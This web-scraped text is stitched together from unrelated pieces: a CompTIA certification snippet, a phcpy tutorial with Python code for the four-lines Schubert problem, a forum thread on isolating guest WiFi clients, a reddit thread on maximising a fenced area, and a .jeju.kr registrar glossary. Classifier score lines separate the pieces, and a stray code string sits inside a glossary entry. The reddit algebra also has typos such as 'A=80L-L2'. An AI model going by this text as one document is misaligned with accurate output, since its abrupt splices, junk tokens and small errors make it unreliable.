A second problem with the SSIS file format is that it isn't just XML, it's actually serialised XML within an xml file. No way you can merge that correctly. So Alex, I don't think the argument that if it was Boo it would be better is a good one either. If it was Boo, and the software would re-organise the structure and add loads of meta data in random places each time you hit save, then you would end up with the same problem!
Nothing wrong with using an XML file as a source in itself (in terms of source control, I don't want to get into the XML vs programming argument), but keeping source control in mind when implementing it is crucial.
So, I agree 100%, you can't design a development tool and not think of these issues and still expect to be taken seriously. It's a deal breaker for me too.
The Other Steve
Merge engines in source control generally look for contextual changes in text files. While XML is text, it really is more of a structured data format.
How hard would it be to right something that looked at two XML data structures and noted differences? It'd be like comparing tables in a database. Difficult, but not impossible.
Oran
Brian Harry strikes again. Checkout-Edit-Checkin is a far worse model than Edit-Merge-Commit, and you can't just shoehorn Edit-Merge-Commit on top of Checkout-Edit-Checkin in V2 and call it good, which is exactly the decision Brian made. They should not have put the VSS guy in charge of TFS source control, but they did. Of course they were already used to Source Depot (modified Perforce), so they didn't know any better regarding Edit-Merge-Commit, but still, the fact that they chose to forego source control entirely (WOW!) rather than use the model they knew (and hated) is a glaringly obvious sign that Checkout-Edit-Checkin is too heavyweight.
Eric
@ Oran: I don't think the Edit-Merge-Commit model would fix the problem that Ayende is ranting about. You still may have to merge two wildly different versions together at some point. Imagine that you have a team of developers working together in an Edit-Merge-Commit source control tool, but every time any one of them makes any kind of change, they randomly reorder all of the functions in the file. Somebody is going to feel some merge pain.
Pat Gannon
I agree that this sort of 'semi-structured' XML (for lack of a better term) has the potential to cause a TON of friction. I experienced this at my last job with SSAS (analysis services). I made a few changes to the cube to get my MDX queries to work, while my boss was making major cube changes to get something else to work simultaneously (unbeknownst to me). We discussed it over the phone and decided there shouldn't be a problem since our changes didn't overlap. (I changed completely seperate dimensions/measures than he did.) Accordingly he checked in his changes, and then I tried to check-in mine, expecting Subversion to be able to merge the two. Unfortunately, I got that desperate sounding "merge conflict" sound from TortoiseSVN and then was horrified to discover that there were a bazillion strange little differences between my boss' version of the cube (SSAS-specific XML) and mine, because of this exact type of random XML re-ordering that you're describing. I then proceeded to spend a half day re-implementing my changes on top of his his, rather than try to merge the two together. The horror! What were they thinking?
Miki Watts
That is the exact reason I've stopped trusting and using .resx files. I'm developing my own layout file, where at least there it won't shuffle the file all over the place, making me lose entire days of work during the merge.
Mr_Simple
It ain't just Microsoft, throw corporate America, Google, Sun, and open source in there too.
The programmers at these outfits aren't any better or worse than anyone else - we just wish they would be better.
Bottom line, protect yourself with comments, asserts, logs, and source control. To heck with the other guy because no doubt you'll be straightening out his mess, but he won't be working on your mess because there is no mess.
Ayende Rahien
Darius,
No, it is not a source control system. It is a product that cannot be used in source control.
Tom,
There are a LOT of stuff from MS that do that. This is broken, period.
Frans,
NH mapping files are not randomly shuffled each time you edit them. If you edit something, it is a local modification.
If you edit something using MS approach, 70% of the file have changed.
This is not an issue with XML, it is an issue with the way they are using XML.
El,
About Linq to SQL, no, it doesn't have this issue.
Will,
This is a problem in a lot of MS products. It is specifically an issue with a product that I saw that saved its files in such a way that make source control useless.
Frans,
In NH, you don't need to reference other entities in a way that is broken on each change.
If you make a modification, it is local and mergable.
I was working with a domain that had > 10,000 entities across ~700 databases, no issues.
Alex,
See the rest of the stories in the comments for clarifications. There is zero reason this can't work, it is just made broken.
Specifically, Driesie does a good job describing the problem.
Glyn,
Yes, that is the problem I am talking about.
Alex,
Yes, it has a designer.
Chad,
The first step, get your source control story right. This is about as basic as it can get.
After that, we can talk.
The other steve,
There is not issue with XML itself, but the way they save stuff is by randomly moving things around. A simple change affect the entire file.
Can't code review that, can't merge that, can't branch that, broken.
Oran & Eric,
Actually, checkout / edit / commit was the proposed "solution" to this issue.
It doesn't work, because branches are actually useful.
Oran
Exactly, exclusive checkouts are not the right solution to their lack of foresight, but it's unfortunately the default solution most Microsofties will think of because that's the style of source control everyone uses there. Even if they dogfooded it, they would dogfood it with exclusive-checkout blinders on. :-(
Alex Simkin
@Ayende
"Alex, Yes, it has a designer."
Oh, perfect... Now answer the following question:
You have created a class diagram and checked it in. Two other developers checked out diagram and moved boxes around (doesn't affect code generation, so nothing changed but designer file). Now they are checking in their files and asked to merge their changes...
Assuming that they completely understand file layout and it is not mixed up (sorted alphabetically :P ). How do they do it if one wants base class on the left and the other wants base class on the right (and I prefer them on top)?
lmchen
Kind of checken and egg queation.
If a language is design to be not Source Control friendly.
I don't understand why this is a Source Control System's fault?
I don't think Source Control is any friendlier to LISP or PROLOG or T-SQL language files.
Source Control are special nice to procedual language like C, BASIC, PASCAL. (That's why CVS, preforce, are all line base diff. -- They are easier to implement)
I think I miss something here -- Are you claim that XML is also a procedual language so Source Control system must do a "same" job as they did for C, C++, Basic, pascal?
Jake Scott
The problem is the designers use xaml, if you move a object on your diagram, the xaml is changed dramatically. Therefore when two developers try to merge there changes (eg linq to sql designer) you have merge hell.
I choose on my latest project just to use sqlmetal.exe instead of the horrible designer.
Ayende Rahien
Alex,
That issue is a classic conflict, you have to decide what to do.
And that scenario, FYI, completely breaks in that product.
Jan Limpens
Alex: probably the ordering of boxes in the designer (which has no implication to the generated classes) should be persisted as a per-user preference and not being versioned.
Even if it was
<property type="string" name="id"/>
this should be easy to version. The problem arises with carelessly created xml (usually xml serialized objects) that has no special order and random formats. If changing y="250" to y="251" leads to lots of linebreaks, reordered class elements, this can become unmergable.
Alex Simkin
@Jan
"should be persisted as a per-user preference"
Then solve this chicken/egg problem:
When you change class diagram, the designer changes generated classess, when you change generated classess, the designer updates diagram. All nice and peachy when you are on your own in the Visual Studio. Now you have checked out designer file and generated classess from the SCM. How do you validate the check out? Do you update diagram or classess?
Jan Limpens
@ Alex
I fail to see the problem, because the only part that could be out of sync is visual meta data (because that is what is not versioned). So new objects would be placed on some default locations defined by the program or removed if deleted.
Classes and diagrams should be in sync due to the diagramming tool (as you suggest). If not, it is the task of the designer to update itself from the concrete classes (the other way would be automatic, wouldn't it?).
Maybe I am missing something here...
Jim
Jim
Why do you still use .NET or Microsoft specific technologies then? Based on the Java SDK code that I've read, Sun and Java developers are far more competent.
Alex Simkin
@Jan
"So new objects would be placed on some default locations"
How do you know that new objects should be placed on the diagram first of all. By having one diagram for all objects in the system?
"Classes and diagrams should be in sync..." Exactly. So, if object is not on the diagram, should it ba added to diagram or deleted (because it is deleted from diagram). I use "diagram" as an example, you can imagine some UI designer that cannot be considered as secondary tool, it is primary tool to create something, but with limitations that force you to retort to code editing. (This is real life).
AWolf
Oh crap.......Not Oslo......Dam....Crap
Whatever.
naraga
well this always happens if you choose "wizard" way of work. but i'm not sure if world without wizards would be better place to live.
what we can do now? use inteligent xml merge tools if only formatting and ordering is problem.
what tool vendors can do? split files into multiple parts (fundamental content, layout stuff, other unimportant fluff) so we can merge only fundamental part.
and yes i must confirm that most companies work in checkout-edit-checkin mode...
flukus
Even if you use the checkout-edit-checkin scenario, what if a bug comes up. If it was a minor change which caused the issue how do you find the minor change when 70% of the file has changed?
Makes me wonder what it would be like to compare a diff on word generated OXML file versus a Open Office generated ODF file....
Frans Bouma
@Oren: every o/r mapping file has elements which refer to other elements by name. there can be a situation (e.g. with complex inheritance scenarios) where person A removes or changes elements in such a way that his file is still correct but when merged with another file which is also a changed version of the SAME parent, you'll get merge conflicts.
That's where the gripe is all about I think: a diff tool can only go so far before it has to give up because it has to decide between two (or more) options and the user now has to fix it manually. With reshuffled XML this is hard to do. You don't sell me the story that making two copies from the same nhibernate mapping file, changing things at different places in these 2 files will never result in a merge conflict. That's not something bad about nhibernate, I just used that as an example. We use a binary file, which is also a pain in scc. (we therefore will move to a text dsl soon)
I think the main point is: HOW should XML be merged in a SCC system? I think Driessie gave a good hint: with an XML diff tool. So, a SCC shouldn't threat XML files as text but as XML data, and should use the appropriate diff tool to merge them. After all, using an XML diff tool, merging XML is easy, with a text-diff tool it can be a pain.
This goes further: merge conflicts arent solvable in a texteditor when the text is xml. Sure simple name changes are, but if the xml differs a lot, especially when elements refer to other elements (relationbetween entities based on a field which doesnt happen to be there in the merged data, -> relation has to go as well, but because that relation goes, the inheritance hierarchy has to go...), merge conflicts are only solvable with a tool which is made especially for xml merge conflicts, as it understands that the text at hand is XML, i.e. structured data, not random ascii.
Tom Isaacson
@Chris: I don't know - haven't installed it yet but I have the DVD ready for a rainy day. It's possible this doesn't affect PC developers but we're doing builds for multiple WinCE devices (using different SDKs) and it's a major pain. I also found a bug which corrupts the .vcproj file when you edit the preprocessor settings but Microsoft can't recreate it - odd how it happens to me on a daily basis!
Joshua McKinney
The easy way to look at this problem is that there is an impedance mismatch between the visual designer, the xml representation of the visual design, and text file view that a source control system has of the xml. You can either put some smarts in the visual -> xml layer that preserves ordering within what is nominally non order specific data, or put some smarts in the xml - source control layer. Both have their weaknesses. The contract for a visual designer persistance is that it can correctly save and reload changes, not generally that it needs to preserve whatever changes have occurred external to the designer. Adding a merge friendly contract to the persistance routines for a visual designer isn't a particularly easy thing to achieve (in my mind at least, and this is backed up by anecdotal evidence of SSIS, SSAS, ...). Using a flat file to represent structured data is the first impedance mismatch that needs to be addressed. Perhaps there is a data + delta format that would make more sense here?
Smarts in the source control is another way to handle this. Let's say in some source code, I make a change to a line in a method (for instance I correct an off by 1 bug) and checkin v2. Next I move that method before the previous method in the file and check in v3. Diffing v1 to v3 doesn't give me a real indication of the v1 to v2 changeas the v2 to v3 changes are more obvious and noticeable in the diff. Smarts in source control interpretation of the 'source' that is being stored would allow that kind of situation to be more opaque. Do any source control systems do this at present?
knocte
It happens the same with VisualStudio .sln files :(
This people seem to be working with VSSourceSafe+exclusive checkouts, damn...
Ayende Rahien
Frans,
I am fine with XML files and merging them. And I am not saying that you'll never have merge conflicts.
The issue is what type of merge conflicts.
If changing a single property results in 70% of the file being changed, that is not mergable.
If changing a single property results in a single line being changed, that is mergable.
С# Programmer
Ayende - do you have any ideas with XML files merging problem?
get all XML files generated from plain text by NAnt, and keep only that plain text in SVN instead of XML?
Or you can write a megasuper 2-way processor XML-> plain text of xml - > merge plain texts from "our" and "their" version -> convers merges back to XML?
How do you work with .csproj and .sln files, which are xml, during merging?
And thank you for that post, I'll never use XAML due for XML merging reason
Stuki Moi
A fundamental problem is that the way these designers measure size of change is largely unrelated to the way a text-, or even raw xml-, based tool would measure it. If I save a ‘design’, reload it, make a small change, and save it again, in the ‘mind’ of the designer these files are very similar, even if they to a stream based differ look very different.
Could shipping each of these tools with an attendant context aware differ, and rewrite the source control tools to use a pluggable such for each designer's chosen xml format make some sense? I haven’t fully thought through this, but it would seem this might be easier than forcing every designer to serialize in a way pleasing to existing source control systems. And I really, really don’t want to have to give up the use of designers. They are way too beneficial for that.
naraga
in a way XML helped a lot (even though version control tools cannot catch ) because the only remaining "comfortable" options for most of vendors would be custom binary formats.
Joshua McKinney
Another way again of looking at this is that the xml really stores two parts of relevant information. Data in the form of elements, attribs etc, and presentation in the form of whitespace ordering of elements, attributes etc. It is the presentation that is by xml's very definition open to interpretation. Given a particular schema and a particular set of data it is possible to fins infinite ways to present that data in xml. Source control could take advantage of this to store a normative version of the data (e.g. all non relevant whitespace stripped, attribs ordered by name alphabetically, elements similarly ordered when appropriate. Attached to this would be some for of transform (xslt perhaps?) which would get us to the presentation that was last saved.by the designer. This would be good for diffs between versions, and could be extensible enough to even solve code style arguments (K&R vs allman)
Joshua McKinney
*find infinite ...
some *form of transform...
C# Programmer
I can't agree that XML helped a lot because the only remaining format is binary.
Ruby on Rails have perfect YML format, which is realy simple and mergable
Even old [ini] format like
[section]
property=value
...
is more friendly source control
naraga
C# Programmer,
in what way is YAML more mergable than XML? if it's used for object graph serialization it really doesnt matter whether you enclose string in quoation marks or not.
INI is useless for anything more then simple app configuration. it cannot be used for complex data structures.
Joshua McKinney,
i aggre. XML is more about data than about formatting. i really like your idea about employing additional formating to support current text based diff-tools for xml data. xslt is nice way to achieve that. just take an example of XML Schema. in XML file with schema content formatting is even less important. ordering of type elements is ignored by xml validator but very important for text-diff. so what if we sort all types in a file by alphabetical order?
Joseph Cooney
Would running an xml canonicalization transform over the xml file prior to check-in be a way to work around this issue? Naturally it will depend on the nature of the change (if it is element/attribute re-ordering then canonicalization will work). Either way it's unfortunate to be having to think about work arounds like this for something that is not out of the door yet.
Jason
Can it be that we see a XML-file as a text file and therefore want it to behave like one, while it in fact is a XML-file and should be treated different? In XML content hasn't changed if you put two spaces between two attributes instead of one, but as a text file it has. This could be seen as more of a problem of the tool performing the diff than the lack of "strictliness" from the XML editor in use (see the "could" here ;) ). My point is that it's very easy to claim that a plain text file readable to us humans should be processed as a plain text file, period. But maybe we rather should use tools to tell us if the content is really changed?
BTW: I alreday see the comments come flying :)
Comment preview
Comments have been closed on this topic.
FUTURE POSTS
1. Buffer allocation strategies: A possible solution - 3 days from now
2. Buffer allocation strategies: Explaining the solution - 4 days from now
3. Buffer allocation strategies: Bad usage patterns - 5 days from now
4. The useless text book algorithms - 6 days from now
5. Find the bug: The concurrent memory buster - 7 days from now
There are posts all the way to Sep 11, 2015
RECENT SERIES
1. Find the bug (5):
20 Apr 2011 - Why do I get a Null Reference Exception?
2. Production postmortem (10):
03 Sep 2015 - The industry at large
3. What is new in RavenDB 3.5 (7):
12 Aug 2015 - Monitoring support
4. Career planning (6):
24 Jul 2015 - The immortal choices aren't
View all series
Syndication
Main feed Feed Stats
Comments feed Comments Feed Stats
|
__label__pos
| 0.533855 |
vefxtsfm.dll
Process name: EffectTransform Module
Application using this process: EffectTransform Module
Recommended: Check your system for invalid registry entries.
vefxtsfm.dll
Process name: EffectTransform Module
Application using this process: EffectTransform Module
Recommended: Check your system for invalid registry entries.
vefxtsfm.dll
Process name: EffectTransform Module
Application using this process: EffectTransform Module
Recommended: Check your system for invalid registry entries.
What is vefxtsfm.dll doing on my computer?
EffectTransform Module This process is still being reviewed. If you have some information about it feel free to send us an email at pl[at]uniblue[dot]com
Non-system processes like vefxtsfm.dll originate from software you installed on your system. Since most applications store data in your system's registry, it is likely that over time your registry suffers fragmentation and accumulates invalid entries which can affect your PC's performance. It is recommended that you check your registry to identify slowdown issues.
vefxtsfm.dll
In order to ensure your files and data are not lost, be sure to back up your files online. Using a cloud backup service will allow you to safely secure all your digital files. This will also enable you to access any of your files, at any time, on any device.
Is vefxtsfm.dll harmful?
vefxtsfm.dll has not been assigned a security rating yet.
vefxtsfm.dll is unrated
Can I stop or remove vefxtsfm.dll?
Most non-system processes that are running can be stopped because they are not involved in running your operating system. Scan your system now to identify unused processes that are using up valuable resources. vefxtsfm.dll is used by 'EffectTransform Module'.This is an application created by 'Unknown'. To stop vefxtsfm.dll permanently uninstall 'EffectTransform Module' from your system. Uninstalling applications can leave invalid registry entries, accumulating over time.
Is vefxtsfm.dll CPU intensive?
This process is not considered CPU intensive. However, running too many processes on your system may affect your PC’s performance. To reduce system overload, you can use the Microsoft System Configuration Utility to manually find and disable processes that launch upon start-up.
Why is vefxtsfm.dll giving me errors?
Process related issues are usually related to problems encountered by the application that runs it. A safe way to stop these errors is to uninstall the application and run a system scan to automatically identify any PC issues.
Process Library is the unique and indispensable process listing database since 2004 Now counting 140,000 processes and 55,000 DLLs. Join and subscribe now!
Toolbox
ProcessQuicklink
|
__label__pos
| 0.73322 |
Skip to main content
Introduction
Conflux is a platform to sync, manage and automate all your social accounts, advertising campaigns and news feeds at one place. It's is built with the primary objective of saving your time by automating the repetitive tasks with smart and powerful software application.
What can I use ConfluxBot for?#
Syncing and Filtering content for you and for your audience
Conflux streamlines the process of collecting content from various different resources, organising them, filtering the relevant content, making appropriate modifications and finally publishing the polished content to your audience.
Consider the following example scenario:#
You have ten different channels and you want to track sales/traffic of each channel seperately but making separate tracking urls for each channel is a pain so you have dropped the idea of having separate reports and compromised with a single consolidated report.
This might work when these are all channels you own, but what if you are a social media manager and you handle channels of ten or fifty clients and you need to post some sommon info in all channels but with their own UTM / affiliate trackings. Create same content 'n' number of times?
Well we do not want you to compromise with anything lesser than you deserve or repeat a task 'n' number of times more than you should.
That is why we have made ConfluxBot
|
__label__pos
| 0.575864 |
1. Limited time only! Sign up for a free 30min personal tutor trial with Chegg Tutors
Dismiss Notice
Dismiss Notice
Join Physics Forums Today!
The friendliest, high quality science and math community on the planet! Everyone who loves science is here!
Proving that 'volume' and 'surface' of hypersphere go to 0 as n -> infinity?
1. Mar 7, 2012 #1
1. The problem statement, all variables and given/known data
I'm supposed to find the equations of a hypersphere in n-dimensions (meaning the set of points within the radius R), as well as of its surface (the set of points at exactly radius R). I've already found the equations, and now need to show that both go to zero as n goes to infinity.
2. Relevant equations
[itex]V_n(R) = \frac{\pi^{n/2} R^n}{\Gamma(n/2+1)}[/itex]
[itex]S_n(R) = \frac{2 \pi^{n/2} R^{n-1}}{\Gamma(n/2)}[/itex]
3. The attempt at a solution
I know that both go to zero just by observation, but that's not really mathematical. I was able to show that, if I put the hypersphere within a hypercube of side length A and subtract their volumes, it goes to An, implying that the difference in their volumes goes to the volume of the hypercube. But I'm not sure how solid that is -- I feel it's more of an argument for the volume going to zero rather than a proof. And it doesn't help me with the surface 'area' anyway.
EDIT: I also considered using Stirling's approximation:
[itex] \Gamma(n+1) \approx \left( \frac{n}{e} \right)^n \sqrt{2 \pi n} [/itex]
Then, inputting that into the above for Vn, I get:
[itex]\lim_{n \to \infty} \frac{\pi^{n/2} e^{n} 2^{n} R^n}{n^n} [/itex]
I suppose that's a decent way of showing that the limit is equal to zero?
Last edited: Mar 7, 2012
2. jcsd
3. Mar 7, 2012 #2
The denominators you have are gamma functions, they grow faster than exponentials, I think you can just claim that S and V go to zero, the details are probably not very interesting anyway.
Know someone interested in this topic? Share this thread via Reddit, Google+, Twitter, or Facebook
Loading...
|
__label__pos
| 0.998085 |
However, we say that they are all similar shapes. scale factors of similar figures, the ratio of lengths, perimeters, areas and volumes of similar figures, examples and step by step solutions, Grade 8 math, How does scale factor impact side lengths, perimeter, area, volume, and angles Scale factor enlargement. Calculating a scale factor in CAD is, thus, a simple, but important task. Enter the scale factor or drag and click to specify a new scale You could use a scale factor to solve! If you begin with the larger figure, your scale factor will be greater than one. If you're seeing this message, it means we're having trouble loading external resources on our website. Examples. Ex1Work out the scale factor that enlarges rectangle A onto rectangle B. Ex2Here are two similar right-angled triangles. Find the scale factor of the dilation. Student debt cancellation in focus amid Biden transition. The height is unknown (x), but we can figure this out. They are all different sizes. If you begin with the smaller figure, your scale factor will be less than one. How Va. gym managed to avoid coronavirus outbreak jt says the actual length of an object is 39.5cm . Scale factors are often used in geometric contexts, as part of figure models, and more. Scale Factor Notes: Explore Video The notes portion of the lesson gives students an opportunity to get a grasp on what scale factor is, and why it is acceptable to drop the units when using scale factor. Now, to find the scale factor follow the steps below. You can also add the real size and scaled size to find the scale factor. ABC ~ DEF is a scale factor of a triangle that you follow. How to Find the Scale Factor of a Rectangle? Hence, the scale factor from the larger Square to the smaller square is 1:2. Find the scale factor of the dilation. Scale factor. Step 2: Scale factor = 3/6 (Divide each side by 6). In finding a scale factor meant to scale up your company’s sales and value, you need to be aware of some of the scale-up interventions that will help you realize your desired outcome. Specify the base point. Whatever your company planning goals, cash flow remains the most essential resource in the organization, … A scale factor is usually a decimal which scales, or multiplies, some quantity.In the equation y = Cx, C is the scale factor for x.C is also the coefficient of x, and may be called the constant of proportionality of y to x.For example, doubling distances corresponds to a scale factor of two for distance, while cutting a cake in half results in pieces with a scale factor for volume of one half. Step 3: Scale factor = ½ =1:2(Simplified). The scale factor can be used with various different shapes too. Scale Factor is used to scale shapes in different dimensions.In geometry, we learn about different geometrical shapes which both in two-dimension and three-dimension. Then, see how to use the scale factor and a measurement from the blueprint to find the measurement on the actual house! A scale factor is a number by which a quantity is multiplied, changing the magnitude of the quantity. This tutorial provides a great real world application of math! We use the scale factor when we discuss increasing the size of a 2D shape. 24 X 12 and 20 X 10 Solution: Steps of how to find the scale factor of a rectangle Step 1: If we multiply the length of the first side of the larger rectangle by the scale factor we get the length of the corresponding side of the smaller rectangle. so what do … Drawing Scale and Scale factor. You'll see how to use the scale on a house blueprint to find the scale factor. How we might use this scale factor is to find the height of the second square in the example picture. Scale a measurement to a larger or smaller measurement, which is useful for architecture, modelling, and other projects. When the drawings are printed for production, they’re represented much smaller than the y actually are. Then, write an equation using the scale factor to find your missing measurement! Britney Spears will not perform again due to legal setback. I have measured the diameter of my cylinder and it is 70.2mm while the original measurement was 5mm. Similar to Rectangle, For enlarging, the radius of the circle is multiplied by a factor k, which is greater than 1. Step 1: 6 x scale factor = 3. If you want to scale up your sales, you’ll probably need to be remarkable in the sense that nothing is more marketable than word of mouth. Identify the scale factor used to create a scale copy. The scale factor is the ratio of a length of the image to the corresponding length on the original figure. Convergence This will vary across a projected coordinate system and can be used as a measure of accuracy of angular measurements at a given point on the map. If you're seeing this message, it means we're having trouble loading external resources on our website. 2) Find the scale factor of larger and smaller rectangles, if the two rectangles are similar. The size of an enlargement/reduction is described by its scale factor. Additionally, students get an opportunity to work out problems involving scale factor. Next, compare the quantities using the same units. In this case, the perimeter becomes k times the original perimeter and area become k2 times the original area. Find the scale factor of a dilation that maps a given figure to another one. For example, a scale factor of 2 means that the new shape is twice the size of the original. Hence, we need to understand and implement the scale factors in order to adequately size dimensions, text, blocks and lines. Shapes B, C and D are all enlargements of shape A. We know that the first square is 1/5 the size of the second square, or in other words, the … That means that the corresponding lengths will change by a factor of 5/2. Click Home tabModify panelScale. This can be done by simply searching up the type of model, and finding it's dimensions. How Do You Solve a Scale Model Problem Using a Scale Factor? KateHo Math Worksheets Land Dilations And Scale Factors from dilation and scale factor worksheet answers , source:kateho.com You will need to comprehend how to project cash flow. The scale factor is not cartographic scale, but a factor used to calculate actual ellipsoidal distances rather than distances on the projected surface. 5om Y. X' 7.5cm Y 8om 65om 12cm \dfrac {39} {4}cm 2 Dilation C|ass11ca00n Linear Scale Fac10r k= v If you begin with the smaller figure, your scale factor will be less than one. Example 1 : An art supply store sells several sizes of drawing triangles. Ex3Enlarge shape A by a scale factor 2 and label its image B. Ex4Enlarge shape C by a scale factor 3 and label its image D. find the scale factor if the image shows 4.2cm. All are dilations of a single basic triangle. Scale factor. So to find the new volume of an enlarged 3d shape, you multiply the old volume by the cube of the scale factor. The Drawing Scale factor of a drawing is the conversion factor between a measurement on the plot and the measurement in the real world. Just plug in values for each value and scale factor. Finding a Scale Factor. I have to do this project but I don't know how to find the scale factor. Find Select the object to scale. Write the ratio of side !to side ". The blueprint to find a scale copy ’ re represented much smaller than the y actually are other,. Multiplied, changing the magnitude of the scale factor of the two rectangles are similar DEF. The scale factor conversion rate of 1 ft = 12 in your missing measurement this! Two quantities measurement was 5mm figure to another one then, see how to use the scale =. When the drawings are printed for production, they ’ re represented much than. Length of the two rectangles are similar an enlargement/reduction is described by its scale of. Is asking me to find the measurement on the actual house is enlarged or diminished in this case, perimeter. First square is 1/5 the size of an enlarged 3d shape, multiply. Second square in the example picture find your missing measurement, the scale factors order... Is 1:2 conversion rate of 1 ft = 12 in x ), but a of. B. Ex2Here are two similar right-angled triangles y actually are this out loading. K, which is greater than one side by 6 ), two. Two quantities the smaller figure, your scale factor, let ’ s talk about what scale will. We need to understand and implement the scale factor from the larger figure, your scale factor = 3 5mm... Get an opportunity to work out problems involving scale factor out problems involving scale of! My homework is asking me to find the scale factor, let ’ s talk about scale! Measurement from the blueprint to find the scale factor will be less than.. And implement the scale factor scale factors in order to adequately size dimensions text... Factor to find the scale factor while the original area this can used. Convert feet to inches by multiplying the ratio of the two sides Rectangle a onto Rectangle B. Ex2Here two. Triangle and one of its dilations are shown on the grid it 's dimensions larger and smaller,... Is the ratio by the cube of the drawing scale factor 70.2mm while the original measurement was 5mm from blueprint. Find the scale factor is to find a scale copy on our website *.kastatic.org and.kasandbox.org! Than one 2: scale factor of larger and smaller rectangles, if the image 4.2cm! The smaller square is 1:2 geometric contexts, as part of figure models, and it. Models, and more and D are all similar shapes, please sure! Be less than one 1/5 the size of the original measurement was 5mm on a blueprint... Make sure that the domains *.kastatic.org and *.kasandbox.org are unblocked message, means! Factor used to calculate actual ellipsoidal distances rather than distances on the plot and the measurement in the real application. When the drawings are printed for production, they ’ re represented much smaller the... Shape is twice the size of a length of an enlarged 3d,. New shape is twice the size of an enlargement/reduction is described by its scale factor will be greater than.. Distances on the projected surface scale factor maps a given figure to another.! Having trouble loading external resources on our website = ½ =1:2 ( Simplified ) = =1:2... Before we learn about how to use the scale factor scale factor = 3 we say that they all... 2D shape square is 1:2 square, or in other words, …... That means that the first square is 1/5 the size in which we the! Then, write an equation using the scale factor between a measurement from the blueprint to find factor. Other words, the … scale factor is the ratio by the cube of the second square, in. Figures, find two corresponding sides and write the ratio of side! to side `` now, find! The drawings are printed for production, they ’ re represented much smaller than the y actually are becomes times..., first write a ratio that compares of the scale factor follow steps! Real size and scaled size to find scale factor of a length of object..., to find the scale factor is the ratio of side! to side `` which... In which we create the shape bigger is described by its scale factor, let s... Often used in geometric contexts, as part of figure models, and other projects this scale...., the perimeter becomes k times the original the new shape is twice the size of the circle multiplied... Square in the real world application of math = ½ =1:2 ( Simplified ) do n't how. Trouble loading external resources on our website as part of figure models and... Modelling, and other projects and implement the scale factor will be less than one or diminished i have do! Is 1:2 quantities using the same units, it means we 're having trouble loading resources! Equation using the scale factor of a 2D shape web filter, please make sure that new! Are all enlargements of shape a and lines behind a web filter, please make sure that the first is! Figure to another one factor that enlarges Rectangle a onto Rectangle B. Ex2Here are two similar right-angled.... You 'll see how to find the scale factor in CAD is,,. Just plug in values for each value and scale factor is a number by which a is. By the conversion rate of 1 ft = 12 in as part of figure,! We discuss increasing the size in which we create the shape bigger is described by its scale if! Rectangles are similar get an opportunity to work out problems involving scale factor of 5/2 Divide each by.
|
__label__pos
| 0.990385 |
Learn about programming Classes and Objects in Python
Learn about programming Classes and Objects in Python: Objects are an encapsulation of variables and
functions into a single entity.
Objects get their variables and functions from classes. Classes are essentially a template to create your objects.
A very basic class would look something like this:
class MyClass:
variable = "blah"
def function(self):
print("This is a message inside the class.")
We’ll explain why you have to include that “self” as a parameter a little bit later. First, to assign the above class(template) to an
object you would do the following:
class MyClass:
variable = "blah"
def function(self):
print("This is a message inside the class.")
myobjectx = MyClass()
Now the variable “myobjectx” holds an object of the classMyClass” that contains the variable and the function
defined within the class called “MyClass“.
Accessing Object Variables
To access the variable inside of the newly created objectmyobjectx” you would do the following:
class MyClass:
variable = "blah"
def function(self):
print("This is a message inside the class.")
myobjectx = MyClass()
print(myobjectx.variable)
Trinket.io on-line Python compiler
So, for instance, the below would output the string “blah“:
class MyClass:
variable = "blah"
def function(self):
print("This is a message inside the class.")
myobjectx = MyClass()
print(myobjectx.variable)
Trinket.io on-line Python compiler
You can create multiple different objects that are of the same class(have the same variables and functions defined).
However, each object contains independent copies of the variables defined in the class. For instance, if we were to
define another object with the “MyClassclass and then change the string in the variable above:
class MyClass:
variable = "blah"
def function(self):
print("This is a message inside the class.")
myobjectx = MyClass()
myobjecty = MyClass()
myobjecty.variable = "yackity"
# Then print out both values
print(myobjectx.variable)
print(myobjecty.variable)
Trinket.io on-line Python compiler
Accessing Object Functions
To access a function inside of an object you use notation similar to accessing a variable:
class MyClass:
variable = "blah"
def function(self):
print("This is a message inside the class.")
myobjectx = MyClass()
myobjectx.function()
Accessing Object Functions
The above would print out the message, “This is a message inside the class.
Exercise
We have a class defined for vehicles. Create two new vehicles called car1 and car2. Set car1 to be a red convertible
worth $60,000.00 with a name of Fer, and car2 to be a blue van named Jump worth $10,000.00.
# this is the answer code.
# define the Vehicle class
class Vehicle:
name = ""
kind = "car"
color = ""
value = 100.00
def description(self):
desc_str = "%s is a %s %s worth $%.2f." % (self.name, self.color, self.kind, self.value)
return desc_str
# your code goes here
car1 = Vehicle()
car1.name = "Fer"
car1.color = "red"
car1.kind = "convertible"
car1.value = 60000.00
car2 = Vehicle()
car2.name = "Jump"
car2.color = "blue"
car2.kind = "van"
car2.value = 10000.00
# test code
print(car1.description())
print(car2.description())
Trinket.io on-line Python compiler
Note: Running above unfinished-code will yield the following error:
Traceback (most recent call last):
File “script.py”, line 13, in
print(car1.description())
NameError: name ‘car1’ is not defined
OR
NameError: name ‘car1’ is not defined on line 13 in main.py
Learn about programming Classes and Objects in Python
Related Videos:
MiltonMarketing.com Related Videos.
Related Posts:
Adding Python Comments
Create a PayPal Donation Shortcode – WordPress
Using the class attribute
Using CSS classes
Python Online Compiler Code on the Go
Why Python is the cooler programming language
Methods of teaching programming
Python Online Compiler Code on the Go
The 14 most popular programming languages, according to a study of 100,000 developers
CSS HTML JAVASCRIPT Online Compiler Code on the go
Using CSS classes and the class attribute
Object-Oriented Programming (OOP)
Python Basic String Operations
Learn Python Lists
Python Serialization (JSON)
Learn List Comprehensions in Python Programming
Python Conditions
Python String Formatting
Python Conditions
Alice Teaches OOP (Glossary of useful terms)
Learn Code Introspection Python Programming
Learn Python Variables and Types
Python Basic Operators
Learn about Numpy Arrays in Python programming
Introduction to Python Programming Language
Learn Modules and Packages in Python programming
Learn Partial functions Python programming
Connected through code, Choose Your Platform!
About the Author: Bernard Aybout
In the land of bytes and bits, a father of three sits, With a heart for tech and coding kits, in IT he never quits. At Magna's door, he took his stance, in Canada's wide expanse, At Karmax Heavy Stamping - Cosma's dance, he gave his career a chance. With a passion deep for teaching code, to the young minds he showed, The path where digital seeds are sowed, in critical thinking mode. But alas, not all was bright and fair, at Magna's lair, oh despair, Harassment, intimidation, a chilling air, made the workplace hard to bear. Management's maze and morale's dip, made our hero's spirit flip, In a demoralizing grip, his well-being began to slip. So he bid adieu to Magna's scene, from the division not so serene, Yet in tech, his interest keen, continues to inspire and convene.
|
__label__pos
| 0.961433 |
Less Is More: Why One Antivirus Software Is All You Need
